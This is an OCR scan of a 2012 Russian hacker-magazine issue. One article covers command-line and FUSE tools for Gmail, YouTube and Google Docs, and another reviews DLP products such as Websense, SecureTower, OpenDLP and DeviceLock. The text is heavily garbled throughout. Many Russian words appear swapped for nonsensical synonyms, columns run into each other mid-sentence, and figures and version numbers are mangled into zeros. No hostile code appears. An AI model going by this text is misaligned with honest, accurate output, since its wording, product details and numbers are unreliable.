[Gmaill, Google Docs,

превращения веб-сайтов на приложения . До­

$ google youtube post --category \ Comedy yжoc.avi

Конечно же, невозможно перезабывать равно насчёт контроль­

ном скрипте

не без; wеЬ- т ехноло г иями приложенийl, только его цвета корма .

0. gтls<iir

браузера. Проект удачно загнулся

[а yes л да т оч н ее, переро из в фре йм на касательно р для интересах

$ gcp -f pdf \

$

приложений короче сидеть во Сети , а поль­ зователь сможет распределять их получи и распишись рабочем

"Список покуnок"

Gmaill равным образом откроет страничк у во спринклер ре,

Picasa да YouTube [только присовокупление видео!.

бери которой ничего не поделаешь п в рассуждении дтвердить компетенция

Мы сделано писали об этой утилите на одном с про­

Goog leCL

шлых номеров, певец ому моя персона малограмотный буду повторять

следующих запусках сервиса нисколько подсоединять

равным образом легко приведу до некоторой степени примеров ее ис­

да объяснять невыгодный н у жно.

сверху удаленное у правление. При по­

-7

Инструменты

-7

Создать

мещения ярлыка [рабочий кормежка и/или меню приложенийl, и- вуаля!- нате рабочем столе появится ярлык, в соответствии с клику получай котором

на обособленном окне откроется сайт без ненужных обвесок во виде каталог браузера

да строк ввода/поиска . То но самое, причем даже с командной строки, позволяется произвести

пользования.

да из приложениями, установленными от по­

мощью Chгome

Публикация п ос та на благе от через

0.

Bloggeг:

Мы нашли массу приложений , способных

Web Stoгe [по клику правой

кнопкой мыши!:

сменять безграмотный ввек годный веб-интерфейс

$ google. b.lagger с c:ti tJ.e 'Я в сЦ :.. 'Oткpt>UJ

рщt --Ьlog

'Linuxoid' \ Googlech l ' .--:tags ' linux, \ ДllЯ . ceбя _Google(:~, . \ .

...... Ы.а. с!:>lа, ..1;11а .: . Добавление действие во календарь:

0.

сер висов. Но в чем дело? даже если в целях какого-то экзо­

$ chromium --app=http : //gmail.com

тического веб-сайта покамест никак не разработано нужного приложения или — или существующие нам

Достаточно мыслительный директор

невыгодный приглянулись [как вариант, понравился

окон сохраняет расположение равным образом размеры окна

типовой веб-интерфейсl ? В этом случае

пред закрытием равно восстанавливает его

не запрещается приспособить технологию

Desktop web

appl i catioп, которая обеспечивает пуск

получи и распишись прежнем месте близ следующем запуске.

Функция веб-приложения убирать равным образом на браузере Fiгefox. Здесь всё до этого времени не задавайся : стоит пере­

> youtube

vieыer

>

lnsert an YouTube Ul!l or search somethi ng .•. linux

0 2 3 4 5

-

Б -

0 В -

0 18 11 12 13 14 15 16 17 18 19 28

-

UberStudent 0/eview - liпux Distro 0/evieloJS lby lnflnitely6alactic ) ( 01 :58) Ubuntu 01 . 08 0/eview- linux Distro 0/evieloJS lby lnfinitelyGalactic) 013 : 02) How То Baclc:up Your Frugal Puppy Using Puppy linux lby icyos ) 083 : 06) Creating а DeЬian AIIM JМG for Archos - linux - Part 0 l by metalx1BBВJ ( 08 :56) linux Mint 02 0/evieы- linux Distro 0/evieloJS lby JnfinitelyGalact i cJ 012:41> linux is Better Тhan llindoloJS lby loclc:ergnome) ! B5:BBJ linux lby llhatYouDughtтoKnow) 084:32) linux Mint 02 0/evieы 0 LA5 0 s19eBB l by jupiterbroadcasting J 055 :49) Js Desktop linux Dead? 0 LAS 0 s19e84 lby jupiterbroadcasting ) 081:18 : 08! linux Opti11ization lby Jockergnome) 085:35) openSUSE 02 . 0 0/evieы 0 Тhе linux Action Sho"'! lby jupiterbroadcasting) (55:52) Pinguy OS 01 . 01! 0/evie"'- linux Oistro 0/evieloJS lby lnfinitelyGalacticJ 018 :44) llindoыs is Better Тhan linux lby loclc:ergnore) 084 :87) Fedora 05 0/evie"'- linux Oistro 0/evieыs l by InfinitelyGalactic) 019:17> Мessages from the linux Cшmunity lby ТhelinuxFoundationJ !85:B3 J linux Mint Cinnai!IOfl Desl<top early lool< Jan 08th 0812 lby linux4UnМe) 087 :56) Тhе Не"' Нui\Ьer One Distro? - linux Mint 02 lby gotЬletuJ 088 :1!3) IIIHOOIIS VISТA AEI/0 VS LIHUX UBUHТU BEI/Yl l by tearbd2J 084 :33 ) An lntro to linux Part 0: llhat is linux? !Тhis lleel< ln linuxJ !Ьу th i sыeelc:inlinux) 083:26) Fedora 06 0/eview- Linux Distro 0/evieыs (Ьу lnfinitelyGalactic) (87:57)

волочить favicoп сайта получай пролетарий стол, равно ярлык появится самоуправно собой.

Зто воистину спокойный путь созда­ ния веб-приложений нате рабочем столе, а он не лишен некоторых недостатков. В частности, лично меня весьма напрягает, который использование

склифосовский коптеть почти управлением взять да лишен­ ного элементов управления, только полноценного

веб-браузера со плагинами, расширениями и во всем остальным совершенноненужным

на данном случае балластом, кой лишь сжирает мнемозина равным образом процессори далеко не слабит

дрянной пользы. Позтому ваш покорнейший слуга рекомендовал

бы пускать в дело в целях подобных задач более легкие решения, для примеру минималистичный браузер suгf. Браузер suгf основан сверху движке

WebKit,

невыгодный имеет интерфейса равным образом управляется из помощью клавиатурных комбинаций . Это самый легко­ весный равно борзый с всех браузеров, основан­

Youtube-viewer- консольный скрипт с целью просмотра роликов из YouTube

012

ных в полноценном НТМL-движке, а благодаря тому что возлюбленный

ХАКЕР

03/158/2 01 0


Д остуча ть ся д что касается н ебес

Sup- Мutt-подобный

покупатель к

Gmail

безупречно годится на запуска приложений.

(наnример , во поисках интересн что до г касательно видео

Самый безыскуственный план его запуска выглядит

в

этак :

(например , про управления п по части чт ой ! да ис­

YouTubel,

производить равно отгонять файлы

пользоват ь р азнообразные пер ен аправления ввода-в ы во касательно да. Для тех а серв исо на Гугла

$ surf http:)/gmail.com

существ у е т ч етыре таких вирт уал ьных фай­ ловьlх вместе с равно сте м ы получи и распишись основе

во него только лишь узенькую полоску загрузки,

FUSE: Yout ubeFS, GDataFS, Gm aiiFS, Google Docs FS (ес ть еще goofs, так сие полузаброшен н ая Jаvа­

На экране появится интерфейс

Gmail

на аб­

солютно голом равно чистом виде. Браузер добавит

# vi /etc/gmailfs/gmailfs.conf [account] username=usernamegmail.com password=параль [filesystem] linux_fs_4 fsname

которая отобразится на нижней части окна.

произведение l. Та кж е на Сети можн насчёт н айти f lickгfs ,

Чтобы распатронить нужные габариты окна разом

предна з н ач енн у ю пользу кого загруз ки изоб ражений

в момент запуска, дозволительно выехать

в flickг.co m равно MetaWeЫogFS. С ее в области мощью

у тилитой wmctгl:

можн по части п ости ть на блоги напрямую изо кусок андной

[logs] l evel=INFO logfile=- / gmailfs.log Затем н у жно примонтировать файловую систему:

строки .

Крат ко насчёт пройдемся в соответствии с во всех отношениях фа й ловым

#!/Ьin/sh

surf http://gmail.com wmctrl -r surf -е ·e,se,se,4ee,зee· С крипт откроет

Gmail

размер окна равным

на окне suгf, сделает

000 х 000

равным образом разместит

его во левом верхнем углу, из отступом

00 по левую сторону

да сверху. С через среды рабочего стола

системам равно попробуем сломать не без; я, ко а для да х

использовать. Итак, Youtube FS !code .goog le. com/p/youtubefs/1 - файловая си ст ема ради до­ ст у движение ко YouTube. Этой системы перевелся во большин­

$ ./gma ilfs.py

allow_root

поnе

\

/ тракт /до/каталога

Теперь перейдем ко Google Docs FS (code. google .com/p/google-docs-fs/1 . Эта файловая

стве дистриб у тивов, всё-таки с целью ее у дирекцион в отношении во ко да

построение предоставляет подход для документам

стоит от пошатывать вместе с сайта тарболл равно распако­

Google Docs.

вать его . Пользоваться так:

наравне да всегда другие ФС на нашем обзоре:

$ ./youtubefs .py \

$ gmount

Использовать ее этак а просто,

скрипт несложно обратить во этикетка да разместить

сверху рабочем столе .

/ nуть / по /ка талог а

\

/ трасса / по /каталога

П осле сего во указанном каталоге появят­

После сего на катало г е появятся подката­ логи равным образом файлы во безошибочно таком но виде, во каком

Иногда удобнее безвыгодный эксплуатнуть специаль­

ся совершенно плей-листы равно каналы, получи которые

ные клиенты, а разбирать веб-сервисы

ть1 подписан . В каталогах твоя милость найдешь самочки

они представлены для сайте

во виде азбучная истина файловой системы, идеже не возбраняется

видеозаписи. Аналогичной функционально­

Документы позволено копировать, перемещать,

стью обладает

надбавлять да удалять. Для отключения исполь­

бродяжничать из через файлового менеджера

net l,

GOataFS

( gdatafs . souгcefoгge .

которую допускается сыскать во репазитариях

docs.google.com.

з уем команду gumouпt:

дистрибутивов. Синтаксис ее вызова не­

$ gumount

почем иной:

GOOGLEAUTH

$ gdatafs

l:i§l:lei!C!I

\

/путь)до/каталога

/ маршрут / поперед /к аталога

Веб-сервисы со п особны заслонить примерно

параль

что ни попало настольное приложение. Их безвыгодный нужно Недавно

Google

изменил методика

Файловая налаженность

GmaiiFS

( sг71 . net/

водворять да обновлять. Они позволяют

аутентификации сторонних приложений,

pгojects/gmailfs /1 предназначена про монти­

безвыгодный беспокои ть ся касательно сохранности данных равным образом на­

вследствие чего пользу кого каждой программы lскрипта),

рования почтового ящика

строек . Однако самоуправно интерфейс веб-сервиса

ет возьми основе протокола

может никак не прийти некоторым пользователям

работающей из аккаунтом

Google, nридется

Gmail. Она работа­ IMAP, отчего под

основать индивидуальный nа значимость . Для сего заходим

ее использованием придется заключить его

не так — не то угадать сверх меры тяжеловесным или — или

в страницу

https://www.goog le.com/set-

поддержку на настройках сервиса (Настрой­

назойливым. В этом случае удобнее об­

tings, а там

выбираем оnцию << Авторизация

ки~ Пересылка да

ратиться ко специализированным клиентам

IMAPI.

nараль равным образом задаем свежеиспеченный nараль от nомощью

конфиг

сnециальной стать во конце страницы.

содержания :

03/158/2012

~Включить

После сего нельзя не разбудить

nриложений да сайтов ~Изменить», вводим

ХАКЕР

POP/IMAP

/etc/gmailfs/gmailfs.conf

следующего

равным образом файловым системам, которые, в качестве кого твоя милость смог убеди ть ся, на достаточном количес тв е имеют­ ся сверху просторах Сети . :::И:

013


SYN/ACK

Гуля « gгindeг » Яремчук lgгindeгlё!synack.гul

БОРЬБА С УТЕЧКАМИ КОРПОРАТИВНОЙ ИНФОРМАЦИИ

-

Важныйэтап в развертывании

DLP

-внедрение, в некоторых случаях

В современном мире одним изо ключевых экономических ресурсов является

информация. Кто ей владеет, оный короче обладать успех, во так но период убыль данных практически спокон века означает потерю клиентов, а ведь равно разрушение компании . Именно

почему ныне беспричинно велодрын барыш для DLР-решениям, позволяющим раскрывать и предотвращать передачу конфиденциальной информации. Выбор большой, лидеры еще отнюдь не сформировались, а предложения много раз схожи до функциям, только отличаются логикой работы равным образом заложенными принципами, посему сложиться малограмотный эдак просто.

нельзя не четко сформулировать требования и ожидания

равно «Обесnечить »

DLP

-

всеми данными для того

контроля .

Репозиторий

для того

Ubuntu MyDLP- <tow_n_-

~111.edгatecb .

иm.lц!шn.tu .

ХАКЕР

03/158/2012

.


В поисках да н овраг д буян

КАК ВЫБРАТЬ

DLP?

Информационная невредность стала одной с количество л яющих дея­

тельности первый встречный компании, а соответствующие риски влияют нате ее рейтинг равным образом прелесть пользу кого инвесторо на . П что до ста т истике, во е ­ роя т ность прибыль конфиде н циальной информа ц ии за дейст во ий

сотрудника организации [и н овраг д ера] превы ш ает вероят н стандарт ь уте ч ­ ки во результате взлома, притом сие неграмотный обяза т ельно умышленные действия, юзер может невзначай отпра во ить обложка никак не тому адресату. Д что до появления интернета удостоверять деятельнос т ь

ОШИБКА В РАБОТЕ

DLP

МОЖЕТ

ПРИВЕСТИ К БЛОКИРОВКЕ ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ

сотрудников было почти что невозможно. Н ет, установить контроль, конечно, было реал ь но, так технических средс т во для автоматизации относительно ц есса неграмотный су щ ествовало. Сейчас всё изме н илось.

ражения равно т. п.]. Хорошие системы, в духе правило, используют целое

Деловая переписка повелось в области электронной почте, пользователи

доступные технологии , а распорядитель может несомненно организовывать

общаются с помощью

кредо нетривиально возьми основе подготовленных шаблонов .

lM

равным образом

VoiP,

обмениваются файлами, ведут

блоги, публикуют сведения на сацсетях равно т. д. Все сии каналы

Кроме того, DLР-система должна оборудовать службу безопасно­

несложно осматривать автоматически, пропускная способность современных

сти инструментом на анализа всех событий да архивом переданной

серверов да вместительность носителей позволяют навалить да обрабаты на ать

информации. Еще одним критерием, определяющим одно изо двух

эмпирика на реальном времени. Ч тобы обнаружит ь да пре д отврати т ь

является способ закреплять утечку дан н ых на реальном вре­

передачу конфиденциальных данных в разных буква п ахти [при пере­ меще нии, использовании да хранении ] , применяется целешенький сословие

мени. Однако специалисты по-различному относятся для этой функции,

систем защиты-

особенно получай этапе ввода на вон как из плуатацию] может повергнуть для бло­

DLP [Data Leak

Ргеvепtiоп] . На настоящее суще­

однако промах во работе

DLP,

DLP [а ложные срабатывания случаются,

ствует уже от десяток терминов-синонимов с целью таких сис т ем:

кировке весь легального трафика, а значит, помочь работе со­

[lпfoгmatioп

трудников . Поэтому многие администраторы предпочитают рассмотрение

ILDP Leak Detectioп & Pгeveпtion], IPC [lnfoгmation Pгotection and Contгol], ILP [lпfoгmatioп Leak Ргеvепtiоп] да др . Задача у них,

по мнению факту, а безграмотный блокировку.

на общем-то, простая - мониторинг, равным образом д ентификация да ограда .

Официальных стандартов, касательно п ре д еляющих, кой д олжна составлять

DLP,

WEBSENSE DATA SECURITY SUITE

доколь безвыгодный существует, следственно разработчики nо-разному смо т рят

Са й т проекта :

получи функции

Лицензия:проприетарная .

DLP.

Часто не запрещается столкнуться самые неравные реали­

websense.com .

зации, отнюдь не денно и нощно включающие воистину необходимое или,

ОС со ервер :

наоборот, напичканные ненужным функционалом, добавлен н ым

ОС клиенты: Windows Vista , 0, 0003, 0008/R2.

согласно заказу компании. Однако со временем определились некотор ы е

Русифи для ация: отсутствует.

требования, которыми надо иметь отличительной особенностью полнофункциональное

Windows Server 0003 R2 .

Калифорнийская организация

Websense

славно известна что

DLР-решение. В первую ряд они касаются д иапазона возмож­

исполнитель систем филырации веб-трафика, во частности,

ных каналов утечки:

на

электронная связь

[SMTP, РОРЗ, IMAP];

Facebook

немного спустя достаточно внедрена ее разрабатывание ради защиты быть

переходе согласно внешним ссылкам. Решения ориентированы во первую

программы обмена IМ/Vо iР -сообщениями равно Р2Р-клиенты; веб-ресурсы [социаль н ые се т и, форумы, бло г и], а да пере ­

хвост держи сре д ние равно круnные компании со штатом сверх

000

сотрудников да государственные учреждения. Комплекс Webseпse

после число отсчетов контроля основных каналов обмена д анными позволя­

порция файлов по мнению протоколам НТТ Р, НТТ РS равно FТР ;

DSS

сетевая пресса [SM В P гinting, NCP Pгintiпg , LPD, равным образом т. д . ]; внешние устройства [USB, CD/DVD, принтеры, Bluetooth, модемы и т. п . ], сетевые папки .

ет во реальном времени остановить утечку конфиденциальной ин­ формации . Он работает держи основе технологии цифровых отпечатков PгeciseiD, разработанной компанией PoгtAuthority которую

Websense

купила на

0006

году .

PreciseiD

Technologies,

обеспечивает вы­

сокую определённость обнаружения конфиденциальных данных равно никак не име­

Характер п ередаваемых истинно нн ых определяетс автор этих строк порядком обнару­

жения специфических признаков [метки, хе ш- фи н кции, грифы ] и анализа контента [статистический анализ, регулярные доставать

ет некоторых недостатков лингвис т ических методов . Д анные опи­ сываются быть помощи « цифрового отпечатка >>, представляющего

~.:._:=~ -~ ~-~-'"'-w ~~.--------,IЬ"',..=.-= ..:::~=·=-·- - - - - - - - - J ....

·-. --

0dl c.-c~

lii $~--

'""'""""!''!IIIIICI!I=a=ВI!!Iii!!IC=---~~==~

~~

.......

___

:IJ"ICO:u'lq~Yypts

---~ __.... • 0 • IG • \2 • 0 • • • '

~-~

'11"~... .._

,) 12 • 0 • • • '

• 0 • 'IO • Il

...... '!~"

__ .._

~~,._

--

к..---

в-

--

--

е

_

-----------

____

~~~-r,.",

.

-

! в.:-

.-

.

01Ь!88!-=- • 0rь.-.

ее

• - Р--а - з.--

Н аст несметное количество ка разреше н равно й на

ХАКЕР

03/158/2012

DeviceLock Endpoint DLP Suite

Установл е нны й

DeviceLock DLP со лошадь жит шеренга

го ведь на ых n рав гиттия

015


SYN/ACK

WEBSENSE DSS ОПРЕДЕЛЯЕТ РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ ОТВЕТСТВЕННОГОСОТРУДНИКА

Websense Web 0ecuгity Gatewayl. П оддерживается соединение · с Act ive Diгectoгy, Novell eDiгectoгy да Lotus Domino. Совместно с Websense 055 используется шпалеры других приложений, рас ш иряю­ щих потенциал килоом пл екса DLP: Data Еndроiпt-устанавливается сверху конечные П К, идеже контро ­ лирует данные, передаваемые путем U5B равным образом подле печати, попытки сделать скриншоты экрана, сведения lM равным образом т. д . ; Data Мопitог - осуществляет наблюдение каналов передачи, · чтобы что касается п ределить, кто, куда, по образу равным образом ась? ото пр авляет, да сопостави ть с политиками равно бизнес-процессами, снижая риски;

Data Ргоtесt-включает Data Мопitо г, автома т ически блокирует собой сверток символов alias слов документа иначе говоря со д ержимо го полей

утечку данных сверху основе политик;

БД. Такой до д хождение обеспечивает точную классификацию контента

Data Discoveг- схема чтобы поиска равным образом классификации конфи­

сильнее нежели пользу кого 000 форматов прежде кументов (включая та блицы СУБ Д

денциальныхданных, которую допускается пускать в дело в качестве кого на составе

равным образом сжа твоя милость е файлы ! , ну да но если бы показатели перенесены другими словами конвертиро­

055, эдак равным образом отдельно, безграмотный требуетустановки агентов.

ваны во разный формат. Кроме PгeciseiD, используются иные алго­ ритмы : словари, точное равно частичное совпадение, статистический

Для управления всеми решениями Websense используется

разложение да т. д. Вместе со тем интересах анализа информации на продуктах

единая ферма Websense TRITON Coпsole (Java да Apache Tomcatl.

Websense nрименяется изрядно технологий Deep Content Сопtгоl

Websense 055 жуть попросту устано крутить . В картотека сейчас входит М5 0QL 5ег v ег Expгess 0008 R2, так в целях больших сред кризис миновал ис п ользовать

равно T hгeat5eekeг (сканирова н ие веб-сайтов равным образом открытие новых угроз).

полную версию. Первоначальная настраивание дипломат производит­

П роизводится оценка основ н ых каналов передачи: элек­

тро нн ой почты (5М ТР ), сообще ний М5 Exchange, НТТР/НТТР5, FТР, IM/M5N . П редусмотрена соединение по части ICAP из любым да нт ернет­

ся рядом помощи попросту г по отношению мастера, создающего шаблоны со учетом страны да харак т забияка деятельности организации, на томище числе имеют­

ся равно региональные настройки про России .

шлюзом, поддерживающим сие т п ро т окол. Для мони т оринга сервер

FALCONGAZE SECURETOWER

Websense может воцаряться на параклаз либо — либо использовать зеркалирование трафика (5PANI. Websense 055 ав т оматически определяет реакцию получай инци­

Лицензия:nроnриетарная.

дент либо требует подтверж д ения через что касается тв етственно г относительно сотрудника.

ОС сервер:

Система умеет не допускать передачу конфиденциальных данных,

ОС клиенты:

заниматься письмо !специалисту службы безопасности,

Русификация: есть.

Сайт nроекта:

начальнику сиречь владельцу контентаl, бросать внешнюю про­

falconqaze.ru .

Windows 0003/2008lx86/x64). Windows XP/Vista/7/2003/2008lx86/x64).

Относительно молодое решение, разраба тыв аемое россий­

грамму, отправлят ь представление н а п од тв ерж д ение отправки равно др.

ским 000 «Фальконгейз>> . П редставляе т на вывеску программный

Система присваивает ан ц иде нт у у никальны й стриптиз равным образом прикрепля­

продукт, использующий пользу кого поиска конфи д енциальной инфор­

ет для сообщению файл. Администратор задает г ибкие политики

мации технологии контентного, а три бутив н ого равным образом ста ти вместе с т ическо­

от учетом гешефт -проц ессов комок п ании, а во комплекте поставки сейчас

го анализа (ключевые слова, регулярные выражения, печать

имеется в наличии изрядно д еся т заговор шаблонов да н астроенных отчетов

равным образом т. д.) . Обеспечивает сличение всех популярных каналов прибыль

по мнению инцидентам равно активности п ользовате л ей. Продукты Websense

данных, на книжка числе что касается т слеживает вслед за ш ифрова нны й движение

отдельных сотрудников не в таком случае — не то групп, защищают корпоративную

(НТТР/5, FТР/5, РОРЗ/5, 0МТР/5, IMAP, 05CAR, ММР, M5N, XMPP I Если во организации используется М5 Exchange 0007/2010, в таком случае весь

документацию с внесения несанкционированных изменений.

внутренняя равно внешняя переписка вот и все проверяется возьми соот­

Остальные потенциал включают п ринудительное зашифрование

ветствие политикам. Особо не терпится распределить полную поддерж­

позволяют уложить на прокрустово ложе путь для опре д еленным сведениям к

электронной п оч твоя милость (ч ерез шлюз! равно совместную работу не без; други­

ку 0kype, чай 0есuгеТоwег может перенимать голосовой

ми продуктами Websense (напр имер, со шлюзом безопасности

трафик, текстовые сообщения, файлы равно отправляемые 0М5.

ВОЗМОЖНОСТИ

OPENDLP

Проект OpenDLP lc ode.google .com/p/

помощи SSL !используется libcuгl) . Настройку

(nолучать инвентарь файлов, на которых найдены

~1 предлагает сочетание инструментов

большого числа агентов упрощают профил и,

совпадения) да ворочать работой агентов

в целях nредотвращения возможных утечек

содержащие устав сканирования.

!пауза сканированияидеинсталляция

информации со клиентских машин,

В мировоззрение х интересах описания объектов поиска

агента) . В текущей версии далеко не производится

работающи х около управлением Windows . Для сего в подчиненных комnах

используются Регl -со вместимые регулярные

проелушивание сетевого трафика, а в свою очередь

выражения , позволяющие объявлять

изучение информации, копируемой получи и распишись показный

устанавливается мелкий агент.

н в отношении критерий кредиток равным образом паспортов ,

Само создавание производится

пароли, обнаруживать присутствие получай ресурса х

документы на текстовом формате, хранящиеся

на автоматическом режиме чрез Netblos/SMB .

документов от конфиденциальными данными

получай жестком диске кусок жете . Проект на срок

Кроме того, правдоподобно прямое сканнирование

равным образом прослеживать их обработку для внешних

находится на стадии активной разработки .

систем помимо установки агентов на

Windows !через SMB), *niх-системах ISSH) да СУБД IMS SQL равно MySQL). Централизованное правление

сервисах IGoogle Docs , Gmail) . Администратор

Первая вариация перед номером

может настроить сизо-черный равным образом снежнобелый прейскурант

во апреле 0010-го, текущая версия-

каталогов ради сканирования да расправиться

Серверная доза написана нате языке Регl , чтобы

осуществляется рядом помощи веб - интерфейса,

отслеживаемые расширения файлов .

установки разработчики рекомендуют

рокировка данными со агентом производится

В сегодняшнее момент интерфейс позволяет

равным образом

по части каналу связи, зашифрованному быть

просматривать результаты сканирования

016

SSN ,

идеолог , утилита проверяет всего-навсего

0.1

представлена

0.4.3 .

Apache Linux, пользу кого х ранения данных используется MySQL. Агент написан держи языке Си. Исходные

ХАКЕР

03/158/2012


В поисках инсайдера

р

• "--R- м.. - ..,.. _ · -

~~~~~~--------------=~~ lti!Ar. ......

~

• .__w.._........,."...._......,.....,.._..,......,.,.r...,__.._._.._• ._,._w.,_.._.._ ... ___ ....,.

в отношении --

- ·-

.

М! Dq!t!aR "' !:t_. "'D ,em

fQ ~

0Z!SIПa

wш~·

-..-.

_.,_._.......,.., _ _

...-~

rQ ~Scnll

0]iO.J5

_",_.._,

I!Xm!Ncr!SIOWdnмA'ft•l

0tJ ~

$acll

d4J'S

~.,.,._._.,.._,...1....

0[) ~

0о1:С

~

~.,*~,._

~$tp!trdeмi'И1

~==::

~

'4 ~$atlt

WtteqsJEJrtd;IQattr«di!

ro ~

~

r{J ,....... ~

IQ!StqyyD9!\'Ьrdцr+1

--=. . _. "'~

~ '""""*-1

r/J ~

.S0i1t

:::

s.r.

...us

Scr1>l

0835

=::~=-==..:= О.С.. .................. . _

_ . , ....... ......., ..... Н-

031815

_"'._..,. ........... ~ ~., . . . . . - - - - . . . . :к...

~

_ _ ., ............... >d.-

==::

....

r/J ............... ...._ t,Q .......,. --~

t.JI0]5

- < t i - S 0 ........... 0.~

0.J80J5

~--.и--

riJ ~ ....,.е._

dD35

":J ~

~

&.us

~

lt} ........... _ . ,

018)5

_.,s.-.8r~~

~

~~ ~

08И

~"!~~~~

....... -1~---

ИQmAgpiJ!tyrlwм'tJ•ppt

Шаблоны

~"'-'

0IIQ.ta

wн.rurnмt!Qnмtю!aJ

............ .......... """''"' .......

•-

~

АФ!оr•м•и•n

NA«n " F«f·''"A

..""*"•

0cпJrnltetcт....twu-nl,.......'i'nч•

~

:g:::

rD"""""*'"" - . - . . . !/J """"*-1 ._...е.-

гггг ~ · J

~ ~

В об

____

~-

·-·

~ Sllld . . ........, ................... _~ ........... ..... s

~ --

~ ............ ~.-.......... -

~-- ... .u.a!8

• 01111D

____ .. _..,_

... ",. ..... . , . - . . . ..... ..,.__

~ .... - - - -

...

~ ~ l"'::ler.............. ..._., ~."..

,."

c-.-e::IIO.. " - • ""'--_..., ...........-..

-

..... c.-oм-a: ... ......,JJ L-Qoo81:0'8_.._ . . . . . .

=--........- . . .

-..:..,_ ... ...".а-м-. -----~-t.al

::::::~:::::.=.-.:.

-fii...-И168it_.........._ _ " ,..u...,..._..~ -r~-- IIIIW>•-

.

_.,s...a,~~

гггггг- ,.-

Выбор nолитики на рента

Websense DSS

Не постоянно DLP сие умеют другими словами обеспечивают на полном объеме !чащ е ус тановленный представитель контролирует едва текстовые сообщения].

J ...... _ ,..__. ..... a.

Websense Data Security Suite

ния куда пр ос т , с целью управления , создания правил да анализа

испо льз уется консо ль администратора

Falcongaze SecuгeToweг Falcongaze SecuгeToweг

Перехват трафика может бытийствовать настроен выборочно: по мнению IР­

Admiп Coпsole равным образом консо ль безопасности

адресам alias диапазонам, МАС-адресам, п ортам равным образом протоколам,

Clie nt.

логинам, размеру файлов да т. д. Система распознает защи­

щенные батман роле м документы MS Woгd/Excel, PDF равно другие

правил , позволяющих раскрыть отправку ряда данных !номеров кредиток, ИН Н ], культпоход соц вместе с етей, отправку экстракт пользу кого по­

типы архивов. Когда юзер отправляет бумага alias

иска новой работы равно др .

В побег тановленной системе энергетически серия общих

архив, неприкосновенный движение ролл ем, возлюбленная генерирует явление да предо­ ста вляет администратору полную информацию да копию файла.

DEVICELOCK ENDPO INT DLP

SUIТE

SecuгeTo weг контролирует исходняк , копируемые получай внешние

Сайт nроекта:

усишко тройства , шрифт получи локальных да сетевых принтера х. Чтобы

Лиценэия:nроnриетарная .

избежать ошибки подле опре делении отправителя, SecuгeToweг, кроме общепринятой информации, павел уче нной с домена ,

ОС сервер: Windows NT/2000/XP/2003/Vista/2008/7. ОС клиенты: Windows NT/2000/XP/Vista/7.

анализирует всегда контактные данные, IР-адрес равно ступень его

Русификация: ест~

использования, логин во различных месседжерах да т. п. Дал ее

devicelock.com/ru .

Система

DLP, построенная Oevicelock, которое

получай основе предварительно со таточно известного

налаженность заводи т переанальные карто чки , со через которых

решения

весь собранная исходны данные привязывается для учетным записям

сту движение пользователей ко различным периферийным устройствам.

!возможна интегрирование из Active Diгe ctoгy ].

Device loc k разрешает/блокирует приступ от учетом следующих

Кроме того , SecuгeToweг имеет функции, далеко не специфичные в целях

DLP,

да до боли востребованные во большинстве организаций. Та к,

со ее через не возбраняется наблюдать работу сотрудников- си ­ стема циклично делает скрины удивительно ранов для того плацента ую щ е го

просмотра на х ронологическом поряд ке, что касается т слеживае т внутренние

используется к контроля до­

параметров: логина, типа, времени суток , формата файлов и т. д . Сейчас сие центральный элеме нт системы

DLP,

добавленный

что касается пциональным равно модулями Netwoгklock !анализ данных , пере­ дава емых по мнению волокуша ] равно Coпtentlock !собственно, отвечает вслед ана­ лиз равно филырацию данных]. Благодаря новым возможностям научился блоки ровать усик тройства , отслеживая на томишко

да внешние контакты. При этом формируются наглядные интерак­

Deviceloc k

тивные отчеты, сообразно зволяющие во дина мике созерцать после сетевыми

числе равным образом со д ержимое коп ируемы х данных , а малограмотный токмо логин

соб ытиями да активностью отдельных пользователей. На основе со­

п ольз ователя равным образом другие стандартные размер . При этом раз­

светильник нны х данны х аспидски совсем нечего делать обнаружить , в какой мере времени сотрудни для

ные политики хайло навливаются во зависимости через того, работает

потра тил получи и распишись легкий общение, прен ебрегая своими служебными

кусок пьютер на волокуша либо — либо автономно !оперативный да автономный режимы]. Система обстоятельно протоколирует всё-таки образ действий поль­

обяза нн остями, равно нет-нет да и сие имело место. Функционально SecuгeToweг состоит с нескольких компонентов:

зова телей да осуществляет выборочное теневое копировка

се рв ер перехвата трафика- захватывает сетный пробка

данных ради анализа . Она распо з нает больше

равным образом пер е ага ет его на баз у данны х на х ранения !наибо лее требова­

равным образом использует серия механизмов анализа контента: подыскание

тельны й ко ресурсам компонент];

до ключе ваша милость м словам да шаблонам , во книжка числе не без; поддержкой

00

типов файлов

сервер контроля рабочих станций- используется про развер­

регулярных выражений !номера кредиток, адреса, паспортные

тывания агентов сверху рабочая сила станции, мониторинга их работы

документация да т. д . ], словари, развертка до свойствам файлов равно данных

равным образом сбора информации, п ерех вач енной агентами lв книжка числе шиф ­

!название, размер , жете роль, стихи равным образом др.]. Благодаря этому DLP

рованного трафика равным образом данны х что касается работе со внешними устройствами];

может откопать текст, сп рятанный, например, во графических фай ­

сервер обработки информации-выполняетобработку, индекса­ цию да обсуждение данны х, разведка , отправкууведомлений, формирова­

лах . Реализованы белые списки !списки устройств да протоколов и временные списки], позволяющие пользователю минуя проблем

ние отчетов равным образом пр .

п олучи ть до самого не без; туп. Возможна объединение не без; ме ха низмами шиф­ рования Bitlockeг То

В качестве СУБД может фигурировать использован Огасlе,

SQLite

MS SQL

Sегvег,

да PostgгeSQL. Система мелочёвка масштабируется, возле

Go, PGP,

ТгuеСгурt равным образом некоторыми другими .

Таким образом, допускается допустить писать определенные док уме нты лишь получай защищенные носители . Клиентская дробь

необходимости во трал дозволяется предварительно бавит ь н овый сервер, отвечаю­

как и контролирует бампер обмена , PгintScгeeп , пресса докумен­

щий после перехват не так — не то обработку данных. Пр оцесс развертыва-

тов равным образом обнаружи вает работающие кейлоггеры.

ХАКЕР

03/158/2012

017


SYN/ACK

l'{j i..--UO'd-.....

-........ _,..._...,., т о...•• -~-.,....~--·""'-

~ ln.W.""~;ММ'

'\1ooooohold-ro.~,

~ lnoblo !INIМ. .....

n-ohold-fo<r.ь ......

0

_

z

""-·--,...-....., O ln .W..I'I- IM"f~

l11нo•МW-•""'f""' ..... '

l.] ln.W..UII.IUitO~

'"-•l>old-'--...,..• 0

Q ln_ТU.W..,ID,..._

"""''""""-"""~ ' -,

- ·- · ck-~-ol>old

...

